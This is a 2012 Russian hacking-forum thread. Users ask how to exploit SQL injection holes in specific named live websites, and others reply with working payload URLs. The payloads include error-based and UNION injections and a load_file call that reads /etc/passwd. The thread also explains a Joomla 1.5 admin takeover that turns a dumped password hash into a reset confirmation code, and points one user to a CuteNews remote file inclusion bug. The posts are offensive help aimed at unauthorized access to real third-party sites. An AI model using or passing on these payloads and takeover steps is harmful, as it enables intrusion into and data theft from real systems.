Старый 07.11.2012, 03:52   #2491
devv
 
Регистрация: 08.10.2012
Сообщений: 27
Репутация: -4
По умолчанию

Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

И ету: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495'
Но первая важнее

Последний раз редактировалось devv; 07.11.2012 в 03:56..
devv вне форума   Ответить с цитированием
Старый 07.11.2012, 06:21   #2492
kritoto
 
Регистрация: 07.11.2012
Сообщений: 1
Репутация: 0
По умолчанию

Цитата:
Сообщение от devv Посмотреть сообщение
Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

И ету: http://www.publicdomainpictures.net/sponsored_pictures.php?page=495'
Но первая важнее
http://www.publicdomainpictures.net/sponsored_pictures.php?page=495%20and%28select+1+f rom%28select+count%28*%29,concat%28%28select+table _name+from+information_schema.tables+limit+58,1%29 ,floor%28rand%280%29*2%29%29x+from+information_sch ema.tables+group+by+x%29a%29--
kritoto вне форума   Ответить с цитированием
Старый 07.11.2012, 14:19   #2493
Flakt
 
Аватар для Flakt
 
Регистрация: 18.02.2011
Сообщений: 90
Репутация: 0
По умолчанию

[QUOTE=devv;29436]Возможно ли раскрутить данную скюлью?
http://www.aromline.ru/index.php?searchstring=sql%5C'&offset=400

_http://www.aromline.ru/index.php?type=1+and+1=0+union+select+load_file(0x 2f6574632f706173737764)+from+mysql.user+--+
Flakt вне форума   Ответить с цитированием
Старый 07.11.2012, 14:21   #2494
Iwashka
 
Регистрация: 25.09.2012
Сообщений: 15
Репутация: 0
По умолчанию

Здравствуйте.
Возможно ли на Cutenews 1.3.1 что-нибудь сделать, если у нас аккаунт редактора и нет прав на заливку картинок?
Нашел:
Цитата:
http://seclists.org/bugtraq/2006/Nov/521
Но не понимаю, как его применить. Т.е. я должен залить на любой другой сайт текстовый файл с командами РНР и тогда я смогу его выполнить или как?
Iwashka вне форума   Ответить с цитированием
Старый 07.11.2012, 18:27   #2495
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

Iwashka
Вся суть баги по ссылке в register_globals = On, что сейчас маловероятно. С самой CMS не сталкивался.
Untitled вне форума   Ответить с цитированием
Старый 07.11.2012, 23:27   #2496
spari
 
Регистрация: 10.09.2012
Сообщений: 46
Репутация: 24
По умолчанию

devv,
about aromline.ru,the injection point is here-
Код:
select count(*) from table where column like (data or (column like '%[injection]%' or column like '%[injection]%' or column like '%injecion%'))
also,there is whitespace,so we can avoid that and execute our error based injection (since union cannot be with count(*)) like that-
Код:
http://www.aromline.ru/index.php?searchstring=\'))or(1)group/**/by(concat(version(),0x0,floor(rand(0)*2)))having(min(0))%23&offset=400
about publicdomainpictures.net
you can execute union like that-
Код:
http://www.publicdomainpictures.net/sponsored_pictures.php?page=495 and 540 div 0 union select 1,2,3,4,5,6-- -
but no column,so you better use error based.
Iwashka,
its call Remote File Inclusion,learn some-
http://en.wikipedia.org/wiki/Remote_file_inclusion
spari вне форума   Ответить с цитированием
Старый 09.11.2012, 02:07   #2497
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от Sin3v Посмотреть сообщение
Есть SQL Inject на Joomla 1.5.*
Вывел административную учетную запись, хеш брутиться.
Привилегий на запись/считывания файлов нету.
Что еще посоветуете выдернуть чтоб получить доступ к сайту?
https://forum.antichat.ru/showpost.php?p=3334209&postcount=22

Хэш в мд5 и меняй пасс.
kingbeef вне форума   Ответить с цитированием
Старый 09.11.2012, 10:47   #2498
kingbeef
 
Регистрация: 28.10.2011
Сообщений: 17
Репутация: 0
По умолчанию

Цитата:
Сообщение от Sin3v Посмотреть сообщение
Спасибо, хороший способ.
А вот насчет:

Что то я тебя не понял?
Хэш с солью,что ты вынул ты переводишь в мд5 и ставишь тут /index.php?option=com_user&view=reset&layout=confir m как код подтверждения.
kingbeef вне форума   Ответить с цитированием
Старый 09.11.2012, 21:24   #2499
Jeff
 
Регистрация: 18.10.2012
Сообщений: 1
Репутация: 0
По умолчанию

Цитата:
Сообщение от Sin3v Посмотреть сообщение
Не работает так, там другой хеш генерируется который на почту приходит, если тестить на тестовом аккаунте.
Вроде как приходит md5(default_hash), но сам еще не тестил
Jeff вне форума   Ответить с цитированием
Старый 09.11.2012, 22:15   #2500
recfrf
 
Регистрация: 30.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

Цитата:
Сообщение от Sin3v Посмотреть сообщение
Есть SQL Inject на Joomla 1.5.*
Вывел административную учетную запись, хеш брутиться.
Привилегий на запись/считывания файлов нету.
Что еще посоветуете выдернуть чтоб получить доступ к сайту?
точная версия? или хотя бы строчку version из configuration.php-dist
recfrf вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot